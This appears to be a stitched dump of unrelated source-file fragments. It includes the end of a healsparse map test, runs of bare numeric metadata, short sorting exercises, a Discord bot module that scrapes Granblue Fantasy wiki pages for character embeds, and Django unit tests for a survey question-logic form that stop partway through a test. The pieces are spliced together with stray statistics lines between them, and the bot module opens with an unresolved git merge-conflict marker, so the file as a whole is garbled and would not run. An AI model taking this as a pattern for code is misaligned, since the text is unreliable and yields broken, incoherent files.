hpmap_add = np.add(hpmap1, hpmap2)
hpmap_add[mask] = hp.UNSEEN
testing.assert_almost_equal(hpmap_add, add_map.generate_healpix_map())
# Test an example ufunc (np.add) with 3 maps
hpmap_add[mask] = 0
add_map = healsparse.ufunc_union([sparse_map1, sparse_map2, sparse_map3], np.add)
mask2 = (mask) & (hpmap3 == hp.UNSEEN)
hpmap3[hpmap3 == hp.UNSEEN] = 0
hpmap_add = np.add(hpmap_add, hpmap3)
hpmap_add[mask2] = hp.UNSEEN
testing.assert_almost_equal(hpmap_add, add_map.generate_healpix_map())
if __name__ == '__main__':
unittest.main()
| 40.765101
| 108
| 0.634296
| 5,390
| 42,518
| 4.756772
| 0.033581
| 0.051172
| 0.058973
| 0.046804
| 0.963181
| 0.952923
| 0.939623
| 0.922813
| 0.91158
| 0.899099
| 0
| 0.054177
| 0.259819
| 42,518
| 1,042
| 109
| 40.804223
| 0.76051
| 0.062679
| 0
| 0.751159
| 0
| 0
| 0.000203
| 0
| 0
| 0
| 0
| 0
| 0.085008
| 1
| 0.020093
| false
| 0
| 0.010819
| 0
| 0.032458
| 0.001546
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3aca91a9cbd67c66c6d0005e18075a9f7c61501
| 158
|
py
|
Python
|
Phase-2/Search and Sorting/Day-68.py
|
CodedLadiesInnovateTech/python-challenges
|
22ce26c68fea6c7c243ada831e47c52e27a62127
|
[
"MIT"
] | 11
|
2020-05-11T08:41:21.000Z
|
2022-02-27T08:21:37.000Z
|
Phase-2/Search and Sorting/Day-68.py
|
CodedLadiesInnovateTech/python-challenges
|
22ce26c68fea6c7c243ada831e47c52e27a62127
|
[
"MIT"
] | 9
|
2020-05-12T10:46:06.000Z
|
2020-05-28T17:37:19.000Z
|
Phase-2/Search and Sorting/Day-68.py
|
CodedLadiesInnovateTech/python-challenges
|
22ce26c68fea6c7c243ada831e47c52e27a62127
|
[
"MIT"
] | 44
|
2020-05-10T20:53:32.000Z
|
2021-04-25T18:47:08.000Z
|
'''
1. Write a Python program to sort a list of elements using Topological sort.
2. Write a Python program to sort a list of elements using Tree sort.
'''
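# A minimal, illustrative sketch of the two exercises above (not a reference
# solution): Kahn's-algorithm topological sort over an adjacency-list graph,
# and a tree sort built on a plain binary search tree. Function and variable
# names below are our own choices.
from collections import deque

def topological_sort(graph):
    """Return the vertices of a DAG given as {node: [successors]} in topological order."""
    indegree = {node: 0 for node in graph}
    for successors in graph.values():
        for node in successors:
            indegree[node] = indegree.get(node, 0) + 1
    queue = deque(node for node, deg in indegree.items() if deg == 0)
    order = []
    while queue:
        node = queue.popleft()
        order.append(node)
        for nxt in graph.get(node, []):
            indegree[nxt] -= 1
            if indegree[nxt] == 0:
                queue.append(nxt)
    if len(order) != len(indegree):
        raise ValueError("graph has a cycle; no topological order exists")
    return order

def tree_sort(items):
    """Sort a list by inserting into a binary search tree and reading it back in order."""
    def insert(node, value):
        if node is None:
            return [value, None, None]  # [value, left, right]
        if value < node[0]:
            node[1] = insert(node[1], value)
        else:
            node[2] = insert(node[2], value)
        return node

    def inorder(node, out):
        if node is not None:
            inorder(node[1], out)
            out.append(node[0])
            inorder(node[2], out)

    root = None
    for item in items:
        root = insert(root, item)
    result = []
    inorder(root, result)
    return result

# Example usage:
# topological_sort({'a': ['b', 'c'], 'b': ['d'], 'c': ['d'], 'd': []}) -> ['a', 'b', 'c', 'd']
# tree_sort([5, 2, 9, 1]) -> [1, 2, 5, 9]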
| 19.75
| 76
| 0.727848
| 28
| 158
| 4.107143
| 0.5
| 0.104348
| 0.208696
| 0.330435
| 0.782609
| 0.782609
| 0.782609
| 0.782609
| 0.782609
| 0.782609
| 0
| 0.016
| 0.208861
| 158
| 7
| 77
| 22.571429
| 0.904
| 0.93038
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
6ce772f63a4242d85d030090866772727c1c1259
| 24,755
|
py
|
Python
|
Brynhildr/character.py
|
MyUncle/Brynhildr
|
41031f95f1e9a6a06a7633fd6c62d4fe2373fb49
|
[
"MIT"
] | null | null | null |
Brynhildr/character.py
|
MyUncle/Brynhildr
|
41031f95f1e9a6a06a7633fd6c62d4fe2373fb49
|
[
"MIT"
] | null | null | null |
Brynhildr/character.py
|
MyUncle/Brynhildr
|
41031f95f1e9a6a06a7633fd6c62d4fe2373fb49
|
[
"MIT"
] | null | null | null |
<<<<<<< HEAD:Brynhildr/character.py
import discord
from icons import iconreplace
from util import *
async def characterparse(categories: list, source: str, embed: discord.Embed,
simple: bool) -> None:
parsed = BeautifulSoup(source, 'html.parser')
# Generate the title of the embed
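# MediaWiki pages embed a JS config blob containing "wgTitle":"<page title>";
# find("wgTitle") + 10 skips past the literal 'wgTitle":"', and splitting on
# the next double quote extracts the title itself.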
embed.title = source[source.find("wgTitle") + 10:].split('"', 1)[0]
# Generate icon line
await generateicons(categories, embed)
# Get description, and change apostrophe escape characters to actual
# apostrophe
if parsed.find("meta", {"name": "description"}):
description = parsed.find("meta", {"name": "description"})["content"] \
.replace("'", "'")
else:
description = ""
# Find character image
image = parsed.find("meta", {"property": "og:image"})["content"]
# Put the basic content together
embed.description += description
embed.set_thumbnail(url=image)
# Advanced lookup
if not simple:
# Generate advanced information
obtain = await generateobtain(source)
ca = await generateca(source)
skills = await generateskills(source)
supskills = await generatesupskills(source)
# Put it together
embed.add_field(name="How to Recruit", value=obtain, inline=True)
embed.add_field(name="Charge Attack" + ca[0], value=ca[1], inline=True)
# See comment in generateskills
for skill in skills:
embed.add_field(name=skill[0], value=skill[1], inline=False)
embed.add_field(name="Support Skills", value=supskills, inline=False)
async def generateicons(categories: list, embed: discord.Embed) \
-> None:
text = ""
cat_map = {
# Rarity icons
"SSR Characters": " <:Rarity_SSR:730441789667934278>",
"SR Characters": " <:Rarity_SR:730441789319807009>",
"R Characters": " <:Rarity_R:730441789642768464>",
# Element icons
"Fire Characters": " <:Fire:730845600484032624>",
"Water Characters": " <:Water:730845600324780151>",
"Earth Characters": " <:Earth:730845600672776202>",
"Wind Characters": " <:Wind:730845600479707157>",
"Light Characters": " <:Light:730845600915914873>",
"Dark Characters": " <:Dark:730845600613924954>",
# Category icons
"Summer Characters": " <:Summer:793505682250661929>",
"Yukata Characters": " <:Yukata:793506721817034763>",
"Valentine Characters": " <:Valentine:793507530185768980>",
"Halloween Premium Draw Characters": " <:Halloween:793508939723309058>",
"Holiday Premium Draw Characters": " <:Holiday:793509924922720287>",
"Zodiac Characters": " <:Zodiac:793510822282133565>",
"Grand Series Characters": " <:Grand:793511553026359316>",
"Fantasy Characters": " <:Fantasy:793511553134624788>",
"Collaboration Characters": " <:TieIn:793504971173527582>",
"The Eternals": " <:Eternals:793503906347876362>",
"Arcarum Evokers": " <:Evokers:793501266054479913>",
# Race icons
"Draph Characters":
" <:Draph1:731182416441376808><:Draph2:731182416475193464>"
"<:Draph3:731182416407822376><:Draph4:731182416030466070>",
"Erune Characters":
" <:Erune1:731181941662941184><:Erune2:731181942170583060>"
"<:Erune3:731181941474197505><:Erune4:731181941646426133>",
"Harvin Characters":
" <:Harvin1:731177969992859844><:Harvin2:731177970177278023>"
"<:Harvin3:731177970416353280><:Harvin4:731177970353569854>",
"Human Characters":
" <:Human1:731174811774091304><:Human2:731174811518238822>"
"<:Human3:731174811648262155><:Human4:731174811857977384>",
"Other Characters":
" <:Unknown1:731183072850083942><:Unknown2:731183073026375811>"
"<:Unknown3:731183073101742110><:Unknown4:731183072862666813>",
"Primal Characters":
" <:Primal1:731173612035244052><:Primal2:731173611918065684>"
"<:Primal3:731173290848157696><:Primal4:731173290806214736>",
# Weapon proficiency icons
"Sabre Characters":
" <:Sabre1:730454365248159855><:Sabre2:730454663941324861>",
"Dagger Characters":
" <:Dagger1:730455370233020558><:Dagger2:730455370673291314>",
"Spear Characters":
" <:Spear1:730456104898920458><:Spear2:730456104840200363>",
"Axe Characters":
" <:Axe1:730456397942095943><:Axe2:730456397556482110>",
"Staff Characters":
" <:Staff1:730456836221829173><:Staff2:730456836310040677>",
"Gun Characters":
" <:Gun1:730457164552077382><:Gun2:730457164266864784>",
"Melee Characters":
" <:Melee1:730457549672939621><:Melee2:730457549337264139>",
"Bow Characters":
" <:Bow1:730457814627254322><:Bow2:730457814551756840>",
"Harp Characters":
" <:Harp1:730458095591096420><:Harp2:730458095221997580>",
"Katana Characters":
" <:Katana1:730458503742750822><:Katana2:730458504011317319>",
# 5★ uncap icons
"5★ Characters": " <:BlueStar:739887435936301152>",
}
for cat in categories:
if cat in cat_map.keys():
text += cat_map[cat]
embed.description = text + "\n"
async def generateobtain(source: str) -> str:
# Trim
raw = source[source.find("How to Recruit") + 14:].split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, 'html.parser')
# Get information and put it together
link = parsed.find("a")["href"]
text = parsed.find("a").text
obtain = "[" + text + "](https://gbf.wiki" + link + ")"
# If the character is obtained via a recruitment weapon, get that too.
if "Recruitment Weapon" in parsed.text:
recruit = parsed.find("span", {"class": "image_link"})
link = recruit.find("a")["href"]
text = recruit.text.strip()
obtain += "\n**Recruitment Weapon**\n[" + text + "](https://gbf.wiki" \
+ link + ")"
return obtain
async def generateca(source: str) -> list:
# Empty variables to be filled later
name = ""
output = []
outputtext = ""
# Trim the source
raw = source[source.find("/Charge_Attack"):].split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, 'html.parser')
# Miscellaneous cleaning
removetooltip(parsed)
removecitation(parsed)
iconreplace(parsed)
# Check if the CA eventually gets another name
if len(parsed.find_all("td", {"class": "skill-name"})) > 1:
namechange = True
else:
namechange = False
for tr in parsed.find_all("tr"):
# If the row has styling, it's a dud row
if tr.get("style"):
continue
# If the row has a skill-name cell, add it in and mark it as such, then
# remove it to prevent double inclusion
if tr.find("td", {"class": "skill-name"}) and not namechange:
name = " - " + tr.find("td", {"class": "skill-name"}).text
tr.find("td", {"class": "skill-name"}).replace_with("")
if tr.find("span", {"class": "skill-upgrade-text"}):
if namechange:
outputtext += "__" + tr.find("span", {"class":
"skill-upgrade-text"}).text + \
"__\n"
tr.find("span", {"class": "skill-upgrade-text"})\
.replace_with("")
else:
tr.find("span", {"class": "skill-upgrade-text"}) \
.replace_with("\n__" + tr.find("span", {"class":
"skill-upgrade-text"}).text + "__\n")
td = tr.find("td", {"style": "text-align:left;"})
for br in td.find_all("br"):
br.replace_with(" ")
if namechange:
outputtext += "**" + tr.find("td", {"class": "skill-name"}).text + \
":** " + td.text + "\n"
else:
outputtext += td.text
output.append(name)
output.append(outputtext)
return output
async def generateskills(source) -> list:
# Skills are too big to put in one field, so this generates the information
# for each skill to be displayed in its own field.
output = []
# Trim to what's needed
raw = source[source.find("<span class=\"mw-headline\" id=\"Skills\">"):]\
.split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, "html.parser")
parsed = parsed.find("table")
# Miscellaneous cleaning
removetooltip(parsed)
removecitation(parsed)
iconreplace(parsed)
# Skill counter and text buffer for the skill info
i = 1
skillinfo = ""
for tr in parsed.find_all("tr"):
if tr.find_all("th"):
continue
if tr.get("class"):
continue
# Get the cell with the skill name
td = tr.find("td", {"class": "skill-name"})
# Handle any skill name changes
for span in td.find_all("span", {"class": "skill-upgrade-text"}):
for br in span.find_all("br"):
br.replace_with(" ")
span.replace_with("/" + span.text)
skillname = "Skill " + str(i) + ": " + td.text.strip()
# The next three cells don't have a class identifier, so you just have
# to hope the table format stays consistent with all cases
td = tr.find_all("td", {"class": None})
# The first unmarked cell is for the cooldown, which needs handling of
# potential cooldown reductions and linked skills
for span in td[0].find_all("span"):
if "Linked" not in span.text:
span.replace_with("/" + span.text + " ")
else:
span.replace_with("(Linked Skill) ")
skillinfo += "Cooldown: " + td[0].text + "\n"
# The second unmarked cell is for the duration, which needs handling of
# potential upgrades
for span in td[1].find_all("span"):
span.replace_with("/" + span.text + " ")
skillinfo += "Duration: " + td[1].text + "\n"
for span in td[2].find_all("span"):
span.replace_with("/" + span.text)
# The third unmarked cell is for the obtain level, which also includes
# potential upgrades
skillinfo += "Obtained: " + td[2].text + "\n"
# The cell with skill information apparently doesn't have an identifier,
# but it DOES always have a specific styling.
td = tr.find("td", {"style": "text-align:left;"})
for br in td.find_all("br"):
br.replace_with(" ")
for span in td.find_all("span", {"class": "skill-upgrade-text"}):
span.replace_with("\n__" + span.text + "__")
skillinfo += td.text + "\n"
output.append((skillname, skillinfo))
skillinfo = ""
i += 1
return output
async def generatesupskills(source: str) -> str:
output = ""
raw = source[source.find
("<span class=\"mw-headline\" id=\"Support_Skills\">"):] \
.split("</tbody>", 1)[0]
parsed = BeautifulSoup(raw, "html.parser")
parsed = parsed.find("table")
removetooltip(parsed)
removecitation(parsed)
iconreplace(parsed)
for tr in parsed.find_all("tr"):
if tr.find_all("th"):
continue
if tr.get("class"):
continue
output += "**" + tr.find("td", {"class": "skill-name"}).text.strip() + \
"**\n"
if "Extended" in tr.find("td", {"class": "skill-name"}).text:
td = tr.find_all("td", {"style": ""})[1]
else:
td = tr.find_all("td", {"style": ""})[2]
for span in td.find_all("span", {"class": "tooltip"}):
span.replace_with("/" + span.text)
output += "Obtained: " + td.text.strip() + "\n"
td = tr.find("td", {"style": "text-align:left;"})
for span in td.find_all("span", {"class": "skill-upgrade-text"}):
span.replace_with("\n__" + span.text + "__")
for br in td.find_all("br"):
br.replace_with(" ")
output += td.text + "\n"
return output
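# --- Usage sketch (not part of the original module): a hypothetical caller that
# assumes the wiki page HTML has already been fetched elsewhere (e.g. with aiohttp)
# and that `categories` holds the page's category names; `lookup_character` is an
# illustrative name rather than an existing function in this bot.
async def lookup_character(page_html: str, categories: list) -> discord.Embed:
    embed = discord.Embed(description="")
    # characterparse fills in the title, icon line, description, thumbnail and,
    # because simple=False, the recruit/charge-attack/skill fields as well.
    await characterparse(categories, page_html, embed, simple=False)
    return embed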
| 43.736749
| 81
| 0.575843
| 2,543
| 24,755
| 5.556036
| 0.152182
| 0.019817
| 0.011324
| 0.018119
| 0.994692
| 0.994692
| 0.994692
| 0.994692
| 0.994692
| 0.994692
| 0
| 0.140888
| 0.276308
| 24,755
| 565
| 82
| 43.814159
| 0.647558
| 0.125429
| 0
| 0.988914
| 0
| 0
| 0.333803
| 0.172634
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013304
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9f359f0f6dc9121a692cb7584b25dd3ada899151
| 24,394
|
py
|
Python
|
survey/tests/forms/test_question_logic_form.py
|
ericazhou7/uSurvey
|
1236f33355662957e7e1e769dde1811b910673a5
|
[
"BSD-3-Clause"
] | 5
|
2016-08-25T12:48:54.000Z
|
2018-08-16T22:49:43.000Z
|
survey/tests/forms/test_question_logic_form.py
|
ericazhou7/uSurvey
|
1236f33355662957e7e1e769dde1811b910673a5
|
[
"BSD-3-Clause"
] | 2
|
2016-08-11T06:43:56.000Z
|
2016-12-08T09:11:36.000Z
|
survey/tests/forms/test_question_logic_form.py
|
ericazhou7/uSurvey
|
1236f33355662957e7e1e769dde1811b910673a5
|
[
"BSD-3-Clause"
] | 7
|
2016-09-16T11:03:44.000Z
|
2020-10-28T22:01:20.000Z
|
from model_mommy import mommy
from datetime import datetime, date, timedelta
from django.test import TestCase
from survey.models import *
from survey.models.backend import Backend
from survey.forms.logic import LogicForm, LoopingForm
class LogicFormTest(TestCase):
def setUp(self):
# create some questions
self.survey = Survey.objects.create(name='test')
self.batch = Batch.objects.create(name='test', survey=self.survey)
self.module = QuestionModule.objects.create(name='test')
self.qset = QuestionSet.objects.create(name="Females")
QuestionSetChannel.objects.create(qset=self.qset, channel=ODKAccess.choice_name())
self.rsp = ResponseValidation.objects.create(validation_test="validationtest",
constraint_message="message")
def test_correct_validators_is_applied_as_per_question_answer_type(self):
answer_types = Answer.supported_answers() # different types of questions
for answer_type in answer_types:
q = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier=answer_type.choice_name(), text='test',
answer_type=answer_type.choice_name())
l = LogicForm(q)
answer_choice_names = [(validator.__name__, validator.__name__.upper())
for validator in answer_type.validators()]
self.assertEqual(set(l.fields['condition'].choices), set(answer_choice_names))
def test_logic_form_has_options_for_multi_type_questions(self):
for answer_type in [MultiSelectAnswer.choice_name(), MultiChoiceAnswer.choice_name()]:
q = Question.objects.create(identifier=answer_type, text="text", answer_type=answer_type,
qset_id=self.qset.id, response_validation_id=1)
l = LogicForm(q)
self.assertTrue(l.fields.get('option'))
def test_logic_form_does_not_have_options_for_non_multi_type_questions(self):
answer_types = Answer.answer_types()
for answer_type in answer_types:
if answer_type not in [MultiSelectAnswer.choice_name(), MultiChoiceAnswer.choice_name()]:
q = Question.objects.create(identifier=answer_type, text="text", answer_type=answer_type,
qset_id=self.qset.id, response_validation_id=1)
l = LogicForm(q)
self.assertFalse(l.fields.get('option'))
def test_skip_logic_selection_in_form_question_creates_skip_flow(self):
'''Selecting a skip-to action in the logic form should create a skip flow to the chosen question.'''
q1 = Question.objects.create(qset=self.qset, response_validation=self.rsp,identifier='test1',
text='test1', answer_type=NumericalAnswer.choice_name())
q2 = Question.objects.create(qset=self.qset, response_validation=self.rsp,
identifier='test2',
text='test2', answer_type=NumericalAnswer.choice_name())
q3 = Question.objects.create(qset=self.qset, response_validation=self.rsp,
identifier='test3',
text='test3', answer_type=NumericalAnswer.choice_name())
q4 = Question.objects.create(qset=self.qset, response_validation=self.rsp,
identifier='test4',
text='test4', answer_type=NumericalAnswer.choice_name())
q5 = Question.objects.create(qset=self.qset, response_validation=self.rsp,
identifier='test5',
text='test5', answer_type=NumericalAnswer.choice_name())
test_condition = NumericalAnswer.validators()[0].__name__
test_param = '15'
form_data = {
'action': LogicForm.SKIP_TO,
'condition': test_condition,
'value': test_param
}
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question=q1, next_question=q2)
QuestionFlow.objects.create(question=q2, next_question=q3)
QuestionFlow.objects.create(question=q3, next_question=q4)
QuestionFlow.objects.create(question=q4, next_question=q5)
form = LogicForm(q1, data=form_data)
self.assertFalse(form.is_valid())
self.assertIn('next_question', form.errors)
form_data['next_question'] = q4.pk
form = LogicForm(q1, data=form_data)
self.assertTrue(form.is_valid())
form.save()
self.assertTrue(QuestionFlow.objects.filter(question_id=q1.id, next_question_id=q4.id).exists())
qf = QuestionFlow.objects.get(question_id=q1.id, next_question_id=q4.id)
self.assertTrue(qf.text_arguments.filter(param=test_param).exists())
def test_subquestion_selection_in_form_question_creates_branch_flow(self):
'''Selecting a subquestion as the target should create a branch flow to that question.'''
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=TextAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=TextAnswer.choice_name())
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=TextAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=TextAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=TextAnswer.choice_name())
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q5.id)
test_condition = TextAnswer.validators()[0].__name__
test_param = 'Hey you!!'
form_data = {
'action': LogicForm.ASK_SUBQUESTION,
'next_question': q4.pk,
'condition': test_condition,
'value': test_param
}
form = LogicForm(q1, data=form_data)
self.assertTrue(form.is_valid())
form.save()
self.assertTrue(QuestionFlow.objects.filter(question_id=q1.id, next_question_id=q4.id).exists())
qf = QuestionFlow.objects.get(question_id=q1.id, next_question_id=q4.id)
self.assertTrue(qf.text_arguments.filter(param=test_param).exists())
def test_reanswer_selection_in_form_question_creates_flow_to_same_question(self):
'''Selecting the reanswer action should create a flow back to the same question.'''
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=DateAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=DateAnswer.choice_name())
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=DateAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=DateAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=DateAnswer.choice_name())
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
test_condition = 'between'
test_param_upper = datetime.now()
test_param_lower = datetime.now() - timedelta(days=3)
form_data = {
'action': LogicForm.REANSWER,
'condition': test_condition,
'min_value': test_param_lower,
'max_value': test_param_upper
}
form = LogicForm(q2, data=form_data)
self.assertTrue(form.is_valid())
form.save()
self.assertTrue(QuestionFlow.objects.filter(question_id=q2.id, next_question_id=q2.id).exists())
def test_end_interview_selection_in_form_question_creates_flow_to_with_no_next_question(self):
yes = 'yes'
no = 'no'
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=DateAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=MultiChoiceAnswer.choice_name())
q_o1 = QuestionOption.objects.create(question_id=q2.id, text=yes, order=1)
QuestionOption.objects.create(question_id=q2.id, text=no, order=2)
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=DateAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=DateAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=DateAnswer.choice_name())
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question=q1, next_question=q2)
QuestionFlow.objects.create(question=q2, next_question=q3)
QuestionFlow.objects.create(question=q3, next_question=q4)
QuestionFlow.objects.create(question=q4, next_question=q5)
test_condition = MultiChoiceAnswer.validators()[0].__name__
form_data = {
'action': LogicForm.END_INTERVIEW,
'condition': test_condition,
'option': q_o1.text
}
logic_form = LogicForm(q2, data=form_data)
self.assertTrue(logic_form.is_valid())
logic_form.save()
self.assertTrue(QuestionFlow.objects.filter(question=q2, next_question__isnull=True).exists())
def test_attempt_to_set_incorrect_value_gives_form_error(self):
'''A value that fails the answer-type validator should make the form invalid.'''
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=NumericalAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=NumericalAnswer.choice_name())
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=NumericalAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=NumericalAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=NumericalAnswer.choice_name())
test_condition = NumericalAnswer.validators()[0].__name__
test_param = '6267fe'
form_data = {
'action': LogicForm.SKIP_TO,
'next_question': q4.pk,
'condition': test_condition,
'value': test_param
}
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question=q1, next_question=q2)
QuestionFlow.objects.create(question=q2, next_question=q3)
QuestionFlow.objects.create(question=q3, next_question=q4)
QuestionFlow.objects.create(question=q4, next_question=q5)
l = LogicForm(q1, data=form_data)
self.assertFalse(l.is_valid())
def test_specify_wrong_max_value_gives_form_error(self):
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=DateAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=DateAnswer.choice_name())
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=DateAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=DateAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=DateAnswer.choice_name())
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
test_condition = 'between'
test_param_upper = 'now()'
test_param_lower = datetime.now() - timedelta(days=3)
form_data = {
'action': LogicForm.REANSWER,
'condition': test_condition,
'min_value': test_param_lower,
'max_value': test_param_upper
}
l = LogicForm(q2, data=form_data)
self.assertFalse(l.is_valid())
def test_specify_wrong_min_value_gives_form_error(self):
'''An unparsable min_value should make the form invalid.'''
q1 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test1',
text='test1', answer_type=DateAnswer.choice_name())
q2 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test2',
text='test2', answer_type=DateAnswer.choice_name())
q3 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test3',
text='test3', answer_type=DateAnswer.choice_name())
q4 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test4',
text='test4', answer_type=DateAnswer.choice_name())
q5 = Question.objects.create(qset_id=self.qset.id, response_validation_id=1,
identifier='test5',
text='test5', answer_type=DateAnswer.choice_name())
self.qset.start_question = q1
self.qset.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
test_condition = 'between'
test_param_upper = datetime.now()
test_param_lower = 'some time ago'
form_data = {
'action': LogicForm.REANSWER,
'condition': test_condition,
'min_value': test_param_lower,
'max_value': test_param_upper
}
l = LogicForm(q2, data=form_data)
self.assertFalse(l.is_valid())
def test_skip_logic_between_question_groups_not_allowed(self):
'''Skip logic between questions belonging to different respondent groups should be rejected.'''
group = mommy.make(RespondentGroup)
q1 = BatchQuestion.objects.create(qset=self.batch, response_validation=self.rsp, identifier='test1',
text='test1', answer_type=NumericalAnswer.choice_name())
q2 = BatchQuestion.objects.create(qset=self.batch, response_validation=self.rsp,
identifier='test2', text='test2', answer_type=NumericalAnswer.choice_name())
q3 = BatchQuestion.objects.create(qset=self.batch, response_validation=self.rsp, identifier='test3',
text='test3', answer_type=NumericalAnswer.choice_name())
q4 = BatchQuestion.objects.create(qset=self.batch, response_validation=self.rsp, identifier='test45',
text='test45', answer_type=NumericalAnswer.choice_name(), group=group)
q5 = BatchQuestion.objects.create(qset=self.batch, response_validation=self.rsp, identifier='test5',
text='test5', answer_type=NumericalAnswer.choice_name())
test_condition = NumericalAnswer.validators()[0].__name__
test_param = '15'
form_data = {
'action': LogicForm.SKIP_TO,
'next_question': q4.pk,
'condition': test_condition,
'value': test_param
}
self.batch.start_question = q1
self.batch.save()
QuestionFlow.objects.create(question_id=q1.id, next_question_id=q2.id)
QuestionFlow.objects.create(question_id=q2.id, next_question_id=q3.id)
QuestionFlow.objects.create(question_id=q3.id, next_question_id=q4.id)
QuestionFlow.objects.create(question_id=q4.id, next_question_id=q5.id)
form = LogicForm(q1, data=form_data)
self.assertFalse(form.is_valid())
self.assertIn('between questions of different groups is not allowed', form.errors['next_question'][0])
class LoopFlowExtra(TestCase):
def setUp(self):
# create some questions
self.survey = Survey.objects.create(name='test')
self.batch = Batch.objects.create(name='test', survey=self.survey)
self.module = QuestionModule.objects.create(name='test')
self.qset = QuestionSet.objects.create(name="Females")
QuestionSetChannel.objects.create(qset=self.qset, channel=ODKAccess.choice_name())
def test_loop_form_fixed_count(self):
q1 = BatchQuestion.objects.create(qset=self.batch, identifier='test1',
text='test1', answer_type=NumericalAnswer.choice_name())
q2 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1,
identifier='test2', text='test2', answer_type=NumericalAnswer.choice_name())
q3 = BatchQuestion.objects.create(qset=self.batch, response_validation_id=1, identifier='test3',
text='test3', answer_type=NumericalAnswer.choice_name())
